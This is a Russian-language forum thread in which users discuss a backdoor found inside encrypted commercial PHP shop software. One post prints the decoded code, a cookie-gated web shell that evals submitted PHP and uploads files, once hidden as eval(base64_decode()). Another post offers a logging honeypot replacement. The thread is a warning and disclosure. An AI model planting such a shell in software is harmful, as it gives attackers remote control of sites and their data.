Elite-Board - поставь себе backdoor

В подобном сабже как-то некрасиво выглядит говорить А и молчать про Б.

Зарядил так стреляй!

ну да, ну да. :)

Я вообще-то про покупку зазенденных лицензий. Чтобы покупать и устанавливать закриптованный софт надо очень доверять разработчику и при этом мириться с тем, что он-то тебе заведомо не доверяет. 🚬

Я не уверен полностью, что ключи к бэкдору разные для всех покупателей. Если ключ одинаковый, то публикуя название софта, я открываю дыру для всех желающих.

А код из софтинки я-таки опубликую. Он размещен в библиотеке функций, которая инклудится при каждом обращении к админке:

if(isset($_COOKIE['megasecret']))
 {
  if($_COOKIE['megasecret'] == 'удалено на всякий случай')
   {
      echo '<form name=\"megaform\" action=\"\" method=\"post\" enctype=\"multipart/form-data\">
          <input name=\"mega-path\" type=\"text\" value=\"../тоже удалено, успешно гуглится ибо/\">
          <input name=\"mega-file\" type=\"file\">
          <br />
          <textarea name=\"mega-exe\" rows=\"10\" cols=\"100\" wrap=\"off\"></textarea>
          <br />
          <input name=\"mega-str\" type=\"checkbox\" value=\"ON\">
          stripslashes
          <input type=\"submit\" value=\"Send / Execute\">
          </form>
          <hr>
          <textarea rows=\"10\" cols=\"100\" wrap=\"off\">';
     if($_POST['mega-exe'] != '')
      {
       if($_POST['mega-str'] != '')
        {
         $_POST['mega-exe'] = stripslashes($_POST['mega-exe']);
        }
       eval($_POST['mega-exe']);
      }
     echo '</textarea>';
     if(file_exists($_FILES['mega-file']['tmp_name']))
      {
        move_uploaded_file($_FILES['mega-file']['tmp_name'], $_POST['mega-path'].$_FILES['mega-file']['name']);
      }
     exit();
   }
 }

А по стилю на остальной код похоже? Переносы там отступы, кавычки...

Может разработчик криптует крякнутым уже зараженным зендом.

Непохоже, хотя бы потому, что сам код написан в одну строку, без пробелов (я отформатировал для читаемости) и спрятан в такую хрень: eval( base64_decode( ))

Вы в это верите? В коде шелла - путь, характерный именно для этого скрипта.

Lupus, сам-то разработчик что говорит по этому поводу?

Как-то не собрался ему написать. Да и неохота взрослых людей воспитывать.

Либо начнет отрицать, либо наедет за "нарушение лицензии" (раскриптовку), либо уйдет в молчанку. Проверил бы, да недосуг пока.

Судя по путям, то это скрипт популярного шопа. Печально это все.

Очевидно, что не стоит с такими разработчиками работать и доверять им свой бизнес.

P.s. Ну а чтобы было более интересно, поставьте заглушку по этому скрипту + запись в лог, если кто-то будет там ползать.

Или даже лучше всего убить весь скрипт и оставить только это:

if(isset($_COOKIE['megasecret']))
 {
  if($_COOKIE['megasecret'] == 'удалено на всякий случай')
   {
 
## Формирование строки лога
 $xstr=date("d.m.Y")."|";
 $xstr.=date("H:i:s")."|";
 $xstr.="ip=".$_SERVER['REMOTE_ADDR']."|";
 $xstr.="browser=".$_SERVER['HTTP_USER_AGENT']."|";
 $xstr.=$_SERVER['PHP_SELF']."|";
 $xstr.=$_SERVER['QUERY_STRING']."\r\n";

## Запись в лог
 $fc='./hacklog.txt';
 if(file_exists($fc)){$fp=fopen($fc,'a+');fputs($fp,$xstr);fclose($fp);}
 else{$fp=fopen($fc,'w+');fputs($fp,$xstr);fclose($fp);}

     exit();
   }
 }

artmonster, я отказался от установки этой софтины. Нет ни времени, ни желания ее допиливать, а "как есть" она у меня не работает.

В чём чуть топика без указания, что это за скрипт?

Мол я нашёл, а вы партись теперь. Вдруг кто купит лохонётся.

Не сообразили? Не ставьте чужой закриптованный софт, без крайней необходимости.